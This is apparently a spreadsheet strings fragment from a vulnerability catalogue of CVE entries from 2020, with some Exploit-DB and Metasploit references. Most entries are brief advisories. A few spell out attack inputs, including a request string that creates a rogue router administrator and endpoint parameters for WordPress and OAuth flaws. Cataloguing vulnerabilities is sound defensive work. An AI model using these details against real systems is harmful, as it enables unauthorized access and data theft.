  <si>
    <t>CVE-2020-10075</t>
  </si>
  <si>
    <t>GitLab 12.5 through 12.8.1 allows HTML Injection. A particular error header was potentially susceptible to injection or potentially other vulnerabilities via unescaped input.</t>
  </si>
  <si>
    <t>CVE-2020-10076</t>
  </si>
  <si>
    <t>GitLab 12.1 through 12.8.1 allows XSS. A stored cross-site scripting vulnerability was discovered when displaying merge requests.</t>
  </si>
  <si>
    <t>CVE-2020-10077</t>
  </si>
  <si>
    <t>GitLab EE 3.0 through 12.8.1 allows SSRF. An internal investigation revealed that a particular deprecated service was creating a server side request forgery risk.</t>
  </si>
  <si>
    <t>CVE-2020-10078</t>
  </si>
  <si>
    <t>GitLab 12.1 through 12.8.1 allows XSS. The merge request submission form was determined to have a stored cross-site scripting vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-10079</t>
  </si>
  <si>
    <t>GitLab 7.10 through 12.8.1 has Incorrect Access Control. Under certain conditions where users should have been required to configure two-factor authentication, it was not being required.</t>
  </si>
  <si>
    <t>CVE-2020-1008</t>
  </si>
  <si>
    <t>A remote code execution vulnerability exists when the Windows Jet Database Engine improperly handles objects in memory, aka 'Jet Database Engine Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2020-0889, CVE-2020-0953, CVE-2020-0959, CVE-2020-0960, CVE-2020-0988, CVE-2020-0992, CVE-2020-0994, CVE-2020-0995, CVE-2020-0999.</t>
  </si>
  <si>
    <t>CVE-2020-10080</t>
  </si>
  <si>
    <t>GitLab 8.3 through 12.8.1 allows Information Disclosure. It was possible for certain non-members to access the Contribution Analytics page of a private group.</t>
  </si>
  <si>
    <t>CVE-2020-10081</t>
  </si>
  <si>
    <t>GitLab before 12.8.2 has Incorrect Access Control. It was internally discovered that the LFS import process could potentially be used to incorrectly access LFS objects not owned by the user.</t>
  </si>
  <si>
    <t>CVE-2020-10082</t>
  </si>
  <si>
    <t>GitLab 12.2 through 12.8.1 allows Denial of Service. A denial of service vulnerability impacting the designs for public issues was discovered.</t>
  </si>
  <si>
    <t>CVE-2020-10083</t>
  </si>
  <si>
    <t>GitLab 12.7 through 12.8.1 has Insecure Permissions. Under certain conditions involving groups, project authorization changes were not being applied.</t>
  </si>
  <si>
    <t>CVE-2020-10084</t>
  </si>
  <si>
    <t>GitLab EE 11.6 through 12.8.1 allows Information Disclosure. Sending a specially crafted request to the vulnerability_feedback endpoint could result in the exposure of a private project namespace</t>
  </si>
  <si>
    <t>CVE-2020-10085</t>
  </si>
  <si>
    <t>GitLab 12.3.5 through 12.8.1 allows Information Disclosure. A particular view was exposing merge private merge request titles.</t>
  </si>
  <si>
    <t>CVE-2020-10086</t>
  </si>
  <si>
    <t>GitLab 10.4 through 12.8.1 allows Directory Traversal. A particular endpoint was vulnerable to a directory traversal vulnerability, leading to arbitrary file read.</t>
  </si>
  <si>
    <t>CVE-2020-10087</t>
  </si>
  <si>
    <t>GitLab before 12.8.2 allows Information Disclosure. Badge images were not being proxied, causing mixed content warnings as well as leaking the IP address of the user.</t>
  </si>
  <si>
    <t>CVE-2020-10088</t>
  </si>
  <si>
    <t>GitLab 12.5 through 12.8.1 has Insecure Permissions. Depending on particular group settings, it was possible for invited groups to be given the incorrect permission level.</t>
  </si>
  <si>
    <t>CVE-2020-10089</t>
  </si>
  <si>
    <t>GitLab 8.11 through 12.8.1 allows a Denial of Service when using several features to recursively request eachother,</t>
  </si>
  <si>
    <t>CVE-2020-1009</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists in the way that the Microsoft Store Install Service handles file operations in protected locations, aka 'Windows Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-0934, CVE-2020-0983, CVE-2020-1011, CVE-2020-1015.</t>
  </si>
  <si>
    <t>CVE-2020-10090</t>
  </si>
  <si>
    <t>GitLab 11.7 through 12.8.1 allows Information Disclosure. Under certain group conditions, group epic information was unintentionally being disclosed.</t>
  </si>
  <si>
    <t>CVE-2020-10091</t>
  </si>
  <si>
    <t>GitLab 9.3 through 12.8.1 allows XSS. A cross-site scripting vulnerability was found when viewing particular file types.</t>
  </si>
  <si>
    <t>CVE-2020-10092</t>
  </si>
  <si>
    <t>GitLab 12.1 through 12.8.1 allows XSS. A cross-site scripting vulnerability was present in a particular view relating to the Grafana integration.</t>
  </si>
  <si>
    <t>CVE-2020-10093</t>
  </si>
  <si>
    <t>A cross-site scripting (XSS) vulnerability in Lexmark Pro910 series inkjet and other discontinued products.</t>
  </si>
  <si>
    <t>CVE-2020-10094</t>
  </si>
  <si>
    <t>A cross-site scripting (XSS) vulnerability in Lexmark CS31x before LW74.VYL.P273; CS41x before LW74.VY2.P273; CS51x before LW74.VY4.P273; CX310 before LW74.GM2.P273; CX410 &amp; XC2130 before LW74.GM4.P273; CX510 &amp; XC2132 before LW74.GM7.P273; MS310, MS312, MS317 before LW74.PRL.P273; MS410, M1140 before LW74.PRL.P273; MS315, MS415, MS417 before LW74.TL2.P273; MS51x, MS610dn, MS617 before LW74.PR2.P273; M1145, M3150dn before LW74.PR2.P273; MS610de, M3150 before LW74.PR4.P273; MS71x,M5163dn before LW74.DN2.P273; MS810, MS811, MS812, MS817, MS818 before LW74.DN2.P273; MS810de, M5155, M5163 before LW74.DN4.P273; MS812de, M5170 before LW74.DN7.P273; MS91x before LW74.SA.P273; MX31x, XM1135 before LW74.SB2.P273; MX410, MX510 &amp; MX511 before LW74.SB4.P273; XM1140, XM1145 before LW74.SB4.P273; MX610 &amp; MX611 before LW74.SB7.P273; XM3150 before LW74.SB7.P273; MX71x, MX81x before LW74.TU.P273; XM51xx &amp; XM71xx before LW74.TU.P273; MX91x &amp; XM91x before LW74.MG.P273; MX6500e before LW74.JD.P273; C746 before LHS60.CM2.P738; C748, CS748 before LHS60.CM4.P738; C792, CS796 before LHS60.HC.P738; C925 before LHS60.HV.P738; C950 before LHS60.TP.P738; X548 &amp; XS548 before LHS60.VK.P738; X74x &amp; XS748 before LHS60.NY.P738; X792 &amp; XS79x before LHS60.MR.P738; X925 &amp; XS925 before LHS60.HK.P738; X95x &amp; XS95x before LHS60.TQ.P738; 6500e before LHS60.JR.P738;C734 LR.SK.P824 and earlier; C736 LR.SKE.P824 and earlier; E46x LR.LBH.P824 and earlier; T65x LR.JP.P824 and earlier; X46x LR.BS.P824 and earlier; X65x LR.MN.P824 and earlier; X73x LR.FL.P824 and earlier; W850 LP.JB.P823 and earlier; and X86x LP.SP.P823 and earlier.</t>
  </si>
  <si>
    <t>CVE-2020-10096</t>
  </si>
  <si>
    <t>An issue was discovered in Zammad 3.0 through 3.2. It does not prevent caching of confidential data within browser memory. An attacker who either remotely compromises or obtains physical access to a user's workstation can browse the browser cache contents and obtain sensitive information. The attacker does not need to be authenticated with the application to view this information, as it would be available via the browser cache.</t>
  </si>
  <si>
    <t>CVE-2020-10097</t>
  </si>
  <si>
    <t>An issue was discovered in Zammad 3.0 through 3.2. It may respond with verbose error messages that disclose internal application or infrastructure information. This information could aid attackers in successfully exploiting other vulnerabilities.</t>
  </si>
  <si>
    <t>CVE-2020-10098</t>
  </si>
  <si>
    <t>An XSS issue was discovered in Zammad 3.0 through 3.2. Malicious code can be provided by a low-privileged user through the Email functionality. The malicious JavaScript will execute within the browser of any user who opens the Ticket with the Article created from that Email.</t>
  </si>
  <si>
    <t>CVE-2020-10099</t>
  </si>
  <si>
    <t>An XSS issue was discovered in Zammad 3.0 through 3.2. Malicious code can be provided by a low-privileged user through the Ticket functionality in Zammad. The malicious JavaScript will execute within the browser of any user who opens the ticket or has the ticket within the Toolbar.</t>
  </si>
  <si>
    <t>CVE-2020-1010</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists in Windows Block Level Backup Engine Service (wbengine) that allows file deletion in arbitrary locations.To exploit the vulnerability, an attacker would first have to log on to the system, aka 'Microsoft Windows Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1068, CVE-2020-1079.</t>
  </si>
  <si>
    <t>CVE-2020-10100</t>
  </si>
  <si>
    <t>An issue was discovered in Zammad 3.0 through 3.2. It allows for users to view ticket customer details associated with specific customers. However, the application does not properly implement access controls related to this functionality. As such, users of one company are able to access ticket data from other companies. Due to the multi-tenant nature of this application, users who can access ticket details from one organization to the next allows for users to exfiltrate potentially sensitive data of other companies.</t>
  </si>
  <si>
    <t>CVE-2020-10101</t>
  </si>
  <si>
    <t>An issue was discovered in Zammad 3.0 through 3.2. The WebSocket server crashes when messages in non-JSON format are sent by an attacker. The message format is not properly checked and parsing errors not handled. This leads to a crash of the service process.</t>
  </si>
  <si>
    <t>CVE-2020-10102</t>
  </si>
  <si>
    <t>An issue was discovered in Zammad 3.0 through 3.2. The Forgot Password functionality is implemented in a way that would enable an anonymous user to guess valid user emails. In the current implementation, the application responds differently depending on whether the input supplied was recognized as associated with a valid user. This behavior could be used as part of a two-stage automated attack. During the first stage, an attacker would iterate through a list of account names to determine which correspond to valid accounts. During the second stage, the attacker would use a list of common passwords to attempt to brute force credentials for accounts that were recognized by the system in the first stage.</t>
  </si>
  <si>
    <t>CVE-2020-10103</t>
  </si>
  <si>
    <t>An XSS issue was discovered in Zammad 3.0 through 3.2. Malicious code can be provided by a low-privileged user through the File Upload functionality in Zammad. The malicious JavaScript will execute within the browser of any user who opens a specially crafted link to the uploaded file with an active Zammad session.</t>
  </si>
  <si>
    <t>CVE-2020-10104</t>
  </si>
  <si>
    <t>An issue was discovered in Zammad 3.0 through 3.2. After authentication, it transmits sensitive information to the user that may be compromised and used by an attacker to gain unauthorized access. Hashed passwords are returned to the user when visiting a certain URL.</t>
  </si>
  <si>
    <t>CVE-2020-10105</t>
  </si>
  <si>
    <t>An issue was discovered in Zammad 3.0 through 3.2. It returns source code of static resources when submitting an OPTIONS request, rather than a GET request. Disclosure of source code allows for an attacker to formulate more precise attacks. Source code was disclosed for the file 404.html (/zammad/public/404.html)</t>
  </si>
  <si>
    <t>CVE-2020-10106</t>
  </si>
  <si>
    <t>PHPGurukul Daily Expense Tracker System 1.0 is vulnerable to SQL injection, as demonstrated by the email parameter in index.php or register.php. The SQL injection allows to dump the MySQL database and to bypass the login prompt.</t>
  </si>
  <si>
    <t>CVE-2020-10107</t>
  </si>
  <si>
    <t>PHPGurukul Daily Expense Tracker System 1.0 is vulnerable to stored XSS, as demonstrated by the ExpenseItem or ExpenseCost parameter in manage-expense.php.</t>
  </si>
  <si>
    <t>CVE-2020-10108</t>
  </si>
  <si>
    <t>In Twisted Web through 19.10.0, there was an HTTP request splitting vulnerability. When presented with two content-length headers, it ignored the first header. When the second content-length value was set to zero, the request body was interpreted as a pipelined request.</t>
  </si>
  <si>
    <t>CVE-2020-10109</t>
  </si>
  <si>
    <t>In Twisted Web through 19.10.0, there was an HTTP request splitting vulnerability. When presented with a content-length and a chunked encoding header, the content-length took precedence and the remainder of the request body was interpreted as a pipelined request.</t>
  </si>
  <si>
    <t>CVE-2020-1011</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists when the Windows System Assessment Tool improperly handles file operations, aka 'Windows Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-0934, CVE-2020-0983, CVE-2020-1009, CVE-2020-1015.</t>
  </si>
  <si>
    <t>CVE-2020-10110</t>
  </si>
  <si>
    <t>** DISPUTED ** Citrix Gateway 11.1, 12.0, and 12.1 allows Information Exposure Through Caching. NOTE: Citrix disputes this as not a vulnerability. There is no sensitive information disclosure through the cache headers on Citrix ADC. The "Via" header lists cache protocols and recipients between the start and end points for a request or a response. The "Age" header provides the age of the cached response in seconds. Both headers are commonly used for proxy cache and the information is not sensitive.</t>
  </si>
  <si>
    <t>CVE-2020-10111</t>
  </si>
  <si>
    <t>** DISPUTED ** Citrix Gateway 11.1, 12.0, and 12.1 has an Inconsistent Interpretation of HTTP Requests. NOTE: Citrix disputes the reported behavior as not a security issue. Citrix ADC only caches HTTP/1.1 traffic for performance optimization.</t>
  </si>
  <si>
    <t>CVE-2020-10112</t>
  </si>
  <si>
    <t>** DISPUTED ** Citrix Gateway 11.1, 12.0, and 12.1 allows Cache Poisoning. NOTE: Citrix disputes this as not a vulnerability. By default, Citrix ADC only caches static content served under certain URL paths for Citrix Gateway usage. No dynamic content is served under these paths, which implies that those cached pages would not change based on parameter values. All other data traffic going through Citrix Gateway are NOT cached by default.</t>
  </si>
  <si>
    <t>CVE-2020-10113</t>
  </si>
  <si>
    <t>cPanel before 84.0.20 allows self XSS via a temporary character-set specification (SEC-515).</t>
  </si>
  <si>
    <t>CVE-2020-10114</t>
  </si>
  <si>
    <t>cPanel before 84.0.20 allows stored self-XSS via the HTML file editor (SEC-535).</t>
  </si>
  <si>
    <t>CVE-2020-10115</t>
  </si>
  <si>
    <t>cPanel before 84.0.20, when PowerDNS is used, allows arbitrary code execution as root via dnsadmin. (SEC-537).</t>
  </si>
  <si>
    <t>CVE-2020-10116</t>
  </si>
  <si>
    <t>cPanel before 84.0.20 allows attackers to bypass intended restrictions on features and demo accounts via WebDisk UAPI calls (SEC-541).</t>
  </si>
  <si>
    <t>CVE-2020-10117</t>
  </si>
  <si>
    <t>cPanel before 84.0.20 mishandles enforcement of demo checks in the Market UAPI namespace (SEC-542).</t>
  </si>
  <si>
    <t>CVE-2020-10118</t>
  </si>
  <si>
    <t>cPanel before 84.0.20 allows a demo account to modify files via Branding API calls (SEC-543).</t>
  </si>
  <si>
    <t>CVE-2020-10119</t>
  </si>
  <si>
    <t>cPanel before 84.0.20 allows a demo account to achieve remote code execution via a cpsrvd rsync shell (SEC-544).</t>
  </si>
  <si>
    <t>CVE-2020-1012</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists in the way that the Wininit.dll handles objects in memory, aka 'WinINet API Elevation of Privilege Vulnerability'.</t>
  </si>
  <si>
    <t>CVE-2020-10120</t>
  </si>
  <si>
    <t>cPanel before 84.0.20 allows resellers to achieve remote code execution as root via a cpsrvd rsync shell (SEC-545).</t>
  </si>
  <si>
    <t>CVE-2020-10121</t>
  </si>
  <si>
    <t>cPanel before 84.0.20 allows a demo account to achieve code execution via PassengerApps APIs (SEC-546).</t>
  </si>
  <si>
    <t>CVE-2020-10122</t>
  </si>
  <si>
    <t>cPanel before 84.0.20 allows a webmail or demo account to delete arbitrary files (SEC-547).</t>
  </si>
  <si>
    <t>CVE-2020-10123</t>
  </si>
  <si>
    <t>The currency dispenser of NCR SelfSev ATMs running APTRA XFS 05.01.00 or earlier does not adequately authenticate session key generation requests from the host computer, allowing an attacker with physical access to internal ATM components to issue valid commands to dispense currency by generating a new session key that the attacker knows.</t>
  </si>
  <si>
    <t>CVE-2020-10124</t>
  </si>
  <si>
    <t>NCR SelfServ ATMs running APTRA XFS 05.01.00 do not encrypt, authenticate, or verify the integrity of messages between the BNA and the host computer, which could allow an attacker with physical access to the internal components of the ATM to execute arbitrary code, including code that enables the attacker to commit deposit forgery.</t>
  </si>
  <si>
    <t>CVE-2020-10125</t>
  </si>
  <si>
    <t>NCR SelfServ ATMs running APTRA XFS 04.02.01 and 05.01.00 implement 512-bit RSA certificates to validate bunch note acceptor (BNA) software updates, which can be broken by an attacker with physical access in a sufficiently short period of time, thereby enabling the attacker to sign arbitrary files and CAB archives used to update BNA software, as well as bypass application whitelisting, resulting in the ability to execute arbitrary code.</t>
  </si>
  <si>
    <t>CVE-2020-10126</t>
  </si>
  <si>
    <t>NCR SelfServ ATMs running APTRA XFS 05.01.00 do not properly validate softare updates for the bunch note acceptor (BNA), enabling an attacker with physical access to internal ATM components to restart the host computer and execute arbitrary code with SYSTEM privileges because while booting, the update process looks for CAB archives on removable media and executes a specific file without first validating the signature of the CAB archive.</t>
  </si>
  <si>
    <t>CVE-2020-1013</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists when Microsoft Windows processes group policy updates, aka 'Group Policy Elevation of Privilege Vulnerability'.</t>
  </si>
  <si>
    <t>CVE-2020-10134</t>
  </si>
  <si>
    <t>Pairing in Bluetooth® Core v5.2 and earlier may permit an unauthenticated attacker to acquire credentials with two pairing devices via adjacent access when the unauthenticated user initiates different pairing methods in each peer device and an end-user erroneously completes both pairing procedures with the MITM using the confirmation number of one peer as the passkey of the other. An adjacent, unauthenticated attacker could be able to initiate any Bluetooth operation on either attacked device exposed by the enabled Bluetooth profiles. This exposure may be limited when the user must authorize certain access explicitly, but so long as a user assumes that it is the intended remote device requesting permissions, device-local protections may be weakened.</t>
  </si>
  <si>
    <t>CVSS:3.1/AV:A/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:N</t>
  </si>
  <si>
    <t>CVE-2020-10135</t>
  </si>
  <si>
    <t>Legacy pairing and secure-connections pairing authentication in Bluetooth BR/EDR Core Specification v5.2 and earlier may allow an unauthenticated user to complete authentication without pairing credentials via adjacent access. An unauthenticated, adjacent attacker could impersonate a Bluetooth BR/EDR master or slave to pair with a previously paired remote device to successfully complete the authentication procedure without knowing the link key.</t>
  </si>
  <si>
    <t>CVE-2020-10136</t>
  </si>
  <si>
    <t>Multiple products that implement the IP Encapsulation within IP standard (RFC 2003, STD 1) decapsulate and route IP-in-IP traffic without any validation, which could allow an unauthenticated remote attacker to route arbitrary traffic via an exposed network interface and lead to spoofing, access control bypass, and other unexpected network behaviors.</t>
  </si>
  <si>
    <t>CVE-2020-10137</t>
  </si>
  <si>
    <t>Z-Wave devices based on Silicon Labs 700 series chipsets using S2 do not adequately authenticate or encrypt FIND_NODE_IN_RANGE frames, allowing a remote, unauthenticated attacker to inject a FIND_NODE_IN_RANGE frame with an invalid random payload, denying service by blocking the processing of upcoming events.</t>
  </si>
  <si>
    <t>CVE-2020-10138</t>
  </si>
  <si>
    <t>Acronis Cyber Backup 12.5 and Cyber Protect 15 include an OpenSSL component that specifies an OPENSSLDIR variable as a subdirectory within C:\jenkins_agent\. Acronis Cyber Backup and Cyber Protect contain a privileged service that uses this OpenSSL component. Because unprivileged Windows users can create subdirectories off of the system root, a user can create the appropriate path to a specially-crafted openssl.cnf file to achieve arbitrary code execution with SYSTEM privileges.</t>
  </si>
  <si>
    <t>CVE-2020-10139</t>
  </si>
  <si>
    <t>Acronis True Image 2021 includes an OpenSSL component that specifies an OPENSSLDIR variable as a subdirectory within C:\jenkins_agent\. Acronis True Image contains a privileged service that uses this OpenSSL component. Because unprivileged Windows users can create subdirectories off of the system root, a user can create the appropriate path to a specially-crafted openssl.cnf file to achieve arbitrary code execution with SYSTEM privileges.</t>
  </si>
  <si>
    <t>CVE-2020-1014</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists in the Microsoft Windows Update Client when it does not properly handle privileges, aka 'Microsoft Windows Update Client Elevation of Privilege Vulnerability'.</t>
  </si>
  <si>
    <t>CVE-2020-10140</t>
  </si>
  <si>
    <t>Acronis True Image 2021 fails to properly set ACLs of the C:\ProgramData\Acronis directory. Because some privileged processes are executed from the C:\ProgramData\Acronis, an unprivileged user can achieve arbitrary code execution with SYSTEM privileges by placing a DLL in one of several paths within C:\ProgramData\Acronis.</t>
  </si>
  <si>
    <t>CVE-2020-10143</t>
  </si>
  <si>
    <t>Macrium Reflect includes an OpenSSL component that specifies an OPENSSLDIR variable as C:\openssl\. Macrium Reflect contains a privileged service that uses this OpenSSL component. Because unprivileged Windows users can create subdirectories off of the system root, a user can create the appropriate path to a specially-crafted openssl.cnf file to achieve arbitrary code execution with SYSTEM privileges.</t>
  </si>
  <si>
    <t>CVE-2020-10145</t>
  </si>
  <si>
    <t>The Adobe ColdFusion installer fails to set a secure access-control list (ACL) on the default installation directory, such as C:\ColdFusion2021\. By default, unprivileged users can create files in this directory structure, which creates a privilege-escalation vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-10146</t>
  </si>
  <si>
    <t>The Microsoft Teams online service contains a stored cross-site scripting vulnerability in the displayName parameter that can be exploited on Teams clients to obtain sensitive information such as authentication tokens and to possibly execute arbitrary commands. This vulnerability was fixed for all Teams users in the online service on or around October 2020.</t>
  </si>
  <si>
    <t>CVE-2020-10148</t>
  </si>
  <si>
    <t>The SolarWinds Orion API is vulnerable to an authentication bypass that could allow a remote attacker to execute API commands. This vulnerability could allow a remote attacker to bypass authentication and execute API commands which may result in a compromise of the SolarWinds instance. SolarWinds Orion Platform versions 2019.4 HF 5, 2020.2 with no hotfix installed, and 2020.2 HF 1 are affected.</t>
  </si>
  <si>
    <t>CVE-2020-1015</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists in the way that the User-Mode Power Service (UMPS) handles objects in memory, aka 'Windows Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-0934, CVE-2020-0983, CVE-2020-1009, CVE-2020-1011.</t>
  </si>
  <si>
    <t>CVE-2020-1016</t>
  </si>
  <si>
    <t>An information disclosure vulnerability exists when the Windows Push Notification Service improperly handles objects in memory, aka 'Windows Push Notification Service Information Disclosure Vulnerability'.</t>
  </si>
  <si>
    <t>CVE-2020-1017</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists in the way the Windows Push Notification Service handles objects in memory, aka 'Windows Push Notification Service Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-0940, CVE-2020-1001, CVE-2020-1006.</t>
  </si>
  <si>
    <t>exploits/hardware/webapps/48142.txt</t>
  </si>
  <si>
    <t>Comtrend VR-3033 - Command Injection</t>
  </si>
  <si>
    <t>2020-02-27</t>
  </si>
  <si>
    <t>CVE-2020-10173</t>
  </si>
  <si>
    <t>Comtrend VR-3033 DE11-416SSG-C01_R02.A2pvI042j1.d26m devices have Multiple Authenticated Command Injection vulnerabilities via the ping and traceroute diagnostic pages, as demonstrated by shell metacharacters in the pingIpAddress parameter to ping.cgi.</t>
  </si>
  <si>
    <t>CVE-2020-10174</t>
  </si>
  <si>
    <t>init_tmp in TeeJee.FileSystem.vala in Timeshift before 20.03 unsafely reuses a preexisting temporary directory in the predictable location /tmp/timeshift. It follows symlinks in this location or uses directories owned by unprivileged users. Because Timeshift also executes scripts under this location, an attacker can attempt to win a race condition to replace scripts created by Timeshift with attacker-controlled scripts. Upon success, an attacker-controlled script is executed with full root privileges. This logic is practically always triggered when Timeshift runs regardless of the command-line arguments used.</t>
  </si>
  <si>
    <t>CVE-2020-10176</t>
  </si>
  <si>
    <t>ASSA ABLOY Yale WIPC-301W 2.x.2.29 through 2.x.2.43_p1 devices allow Eval Injection of commands.</t>
  </si>
  <si>
    <t>CVE-2020-10177</t>
  </si>
  <si>
    <t>Pillow before 7.1.0 has multiple out-of-bounds reads in libImaging/FliDecode.c.</t>
  </si>
  <si>
    <t>CVE-2020-1018</t>
  </si>
  <si>
    <t>An information disclosure vulnerability exists when Microsoft Dynamics Business Central/NAV on-premise does not properly hide the value of a masked field when showing the records as a chart page.The attacker who successfully exploited the vulnerability could see the information that are in a masked field.The security update addresses the vulnerability by updating the rendering engine the Windows client to properly detect masked fields and render the content as masked., aka 'Microsoft Dynamics Business Central/NAV Information Disclosure'.</t>
  </si>
  <si>
    <t>exploits/multiple/remote/48224.rb</t>
  </si>
  <si>
    <t>ManageEngine Desktop Central - Java Deserialization (Metasploit)</t>
  </si>
  <si>
    <t>2020-03-17</t>
  </si>
  <si>
    <t>CVE-2020-10180</t>
  </si>
  <si>
    <t>The ESET AV parsing engine allows virus-detection bypass via a crafted BZ2 Checksum field in an archive. This affects versions before 1294 of Smart Security Premium, Internet Security, NOD32 Antivirus, Cyber Security Pro (macOS), Cyber Security (macOS), Mobile Security for Android, Smart TV Security, and NOD32 Antivirus 4 for Linux Desktop.</t>
  </si>
  <si>
    <t>CVE-2020-10181</t>
  </si>
  <si>
    <t>goform/formEMR30 in Sumavision Enhanced Multimedia Router (EMR) 3.0.4.27 allows creation of arbitrary users with elevated privileges (administrator) on a device, as demonstrated by a setString=new_user&lt;*1*&gt;administrator&lt;*1*&gt;123456 request.</t>
  </si>
  <si>
    <t>CVE-2020-10184</t>
  </si>
  <si>
    <t>The verify endpoint in YubiKey Validation Server before 2.40 does not check the length of SQL queries, which allows remote attackers to cause a denial of service, aka SQL injection. NOTE: this issue is potentially relevant to persons outside Yubico who operate a self-hosted OTP validation service; the issue does NOT affect YubiCloud.</t>
  </si>
  <si>
    <t>CVE-2020-10185</t>
  </si>
  <si>
    <t>The sync endpoint in YubiKey Validation Server before 2.40 allows remote attackers to replay an OTP. NOTE: this issue is potentially relevant to persons outside Yubico who operate a self-hosted OTP validation service with a non-default configuration such as an open sync pool; the issue does NOT affect YubiCloud.</t>
  </si>
  <si>
    <t>CVE-2020-10187</t>
  </si>
  <si>
    <t>Doorkeeper version 5.0.0 and later contains an information disclosure vulnerability that allows an attacker to retrieve the client secret only intended for the OAuth application owner. After authorizing the application and allowing access, the attacker simply needs to request the list of their authorized applications in a JSON format (usually GET /oauth/authorized_applications.json). An application is vulnerable if the authorized applications controller is enabled.</t>
  </si>
  <si>
    <t>CVE-2020-10188</t>
  </si>
  <si>
    <t>utility.c in telnetd in netkit telnet through 0.17 allows remote attackers to execute arbitrary code via short writes or urgent data, because of a buffer overflow involving the netclear and nextitem functions.</t>
  </si>
  <si>
    <t>CVE-2020-10189</t>
  </si>
  <si>
    <t>Zoho ManageEngine Desktop Central before 10.0.474 allows remote code execution because of deserialization of untrusted data in getChartImage in the FileStorage class. This is related to the CewolfServlet and MDMLogUploaderServlet servlets.</t>
  </si>
  <si>
    <t>CVE-2020-1019</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists in RMS Sharing App for Mac in the way it allows an attacker to load unsigned binaries, aka 'Microsoft RMS Sharing App for Mac Elevation of Privilege Vulnerability'.</t>
  </si>
  <si>
    <t>exploits/linux/remote/48343.rb</t>
  </si>
  <si>
    <t>Nexus Repository Manager - Java EL Injection RCE (Metasploit)</t>
  </si>
  <si>
    <t>CVE-2020-10190</t>
  </si>
  <si>
    <t>An issue was discovered in MunkiReport before 5.3.0. An authenticated user could achieve SQL Injection in app/models/tablequery.php by crafting a special payload on the /datatables/data endpoint.</t>
  </si>
  <si>
    <t>CVE-2020-10191</t>
  </si>
  <si>
    <t>An issue was discovered in MunkiReport before 5.3.0. An authenticated actor can send a custom XSS payload through the /module/comment/save endpoint. The payload will be executed by any authenticated users browsing the application. This concerns app/controllers/client.php:detail.</t>
  </si>
  <si>
    <t>CVE-2020-10192</t>
  </si>
  <si>
    <t>An issue was discovered in Munkireport before 5.3.0.3923. An unauthenticated actor can send a custom XSS payload through the /report/broken_client endpoint. The payload will be executed by any authenticated users browsing the application. This concerns app/views/listings/default.php.</t>
  </si>
  <si>
    <t>CVE-2020-10193</t>
  </si>
  <si>
    <t>ESET Archive Support Module before 1294 allows virus-detection bypass via crafted RAR Compression Information in an archive. This affects versions before 1294 of Smart Security Premium, Internet Security, NOD32 Antivirus, Cyber Security Pro (macOS), Cyber Security (macOS), Mobile Security for Android, Smart TV Security, and NOD32 Antivirus 4 for Linux Desktop.</t>
  </si>
  <si>
    <t>CVE-2020-10194</t>
  </si>
  <si>
    <t>cs/service/account/AutoCompleteGal.java in Zimbra zm-mailbox before 8.8.15.p8 allows authenticated users to request any GAL account. This differs from the intended behavior in which the domain of the authenticated user must match the domain of the galsync account in the request.</t>
  </si>
  <si>
    <t>CVE-2020-10195</t>
  </si>
  <si>
    <t>The popup-builder plugin before 3.64.1 for WordPress allows information disclosure and settings modification, leading to in-scope privilege escalation via admin-post actions to com/classes/Actions.php. By sending a POST request to wp-admin/admin-post.php, an authenticated attacker with minimal (subscriber-level) permissions can modify the plugin's settings to allow arbitrary roles (including subscribers) access to plugin functionality by setting the action parameter to sgpbSaveSettings, export a list of current newsletter subscribers by setting the action parameter to csv_file, or obtain system configuration information including webserver configuration and a list of installed plugins by setting the action parameter to sgpb_system_info.</t>
  </si>
  <si>
    <t>CVE-2020-10196</t>
  </si>
  <si>
    <t>An XSS vulnerability in the popup-builder plugin before 3.64.1 for WordPress allows remote attackers to inject arbitrary JavaScript into existing popups via an unsecured ajax action in com/classes/Ajax.php. It is possible for an unauthenticated attacker to insert malicious JavaScript in several of the popup's fields by sending a request to wp-admin/admin-ajax.php with the POST action parameter of sgpb_autosave and including additional data in an allPopupData parameter, including the popup's ID (which is visible in the source of the page in which the popup is inserted) and arbitrary JavaScript which will then be executed in the browsers of visitors to that page. Because the plugin functionality automatically adds script tags to data entered into these fields, this injection will typically bypass most WAF applications.</t>
  </si>
  <si>
    <t>CVE-2020-10199</t>
  </si>
  <si>
    <t>Sonatype Nexus Repository before 3.21.2 allows JavaEL Injection (issue 1 of 2).</t>
  </si>
  <si>
    <t>CVE-2020-1020</t>
  </si>
  <si>
    <t>A remote code execution vulnerability exists in Microsoft Windows when the Windows Adobe Type Manager Library improperly handles a specially-crafted multi-master font - Adobe Type 1 PostScript format.For all systems except Windows 10, an attacker who successfully exploited the vulnerability could execute code remotely, aka 'Adobe Font Manager Library Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2020-0938.</t>
  </si>
  <si>
    <t>CVE-2020-10203</t>
  </si>
  <si>
    <t>Sonatype Nexus Repository before 3.21.2 allows XSS.</t>
  </si>
  <si>
    <t>CVE-2020-10204</t>
  </si>
  <si>
    <t>Sonatype Nexus Repository before 3.21.2 allows Remote Code Execution.</t>
  </si>
  <si>
    <t>CVE-2020-10206</t>
  </si>
  <si>
    <t>Use of a Hard-coded Password in VNCserver in Amino Communications AK45x series, AK5xx series, AK65x series, Aria6xx series, Aria7/AK7Xx series and Kami7B allows local attackers to view and interact with the video output of the device.</t>
  </si>
  <si>
    <t>CVE-2020-10207</t>
  </si>
  <si>
    <t>Use of Hard-coded Credentials in EntoneWebEngine in Amino Communications AK45x series, AK5xx series, AK65x series, Aria6xx series, Aria7/AK7Xx series and Kami7B allows remote attackers to retrieve and modify the device settings.</t>
  </si>
  <si>
    <t>CVE-2020-10208</t>
  </si>
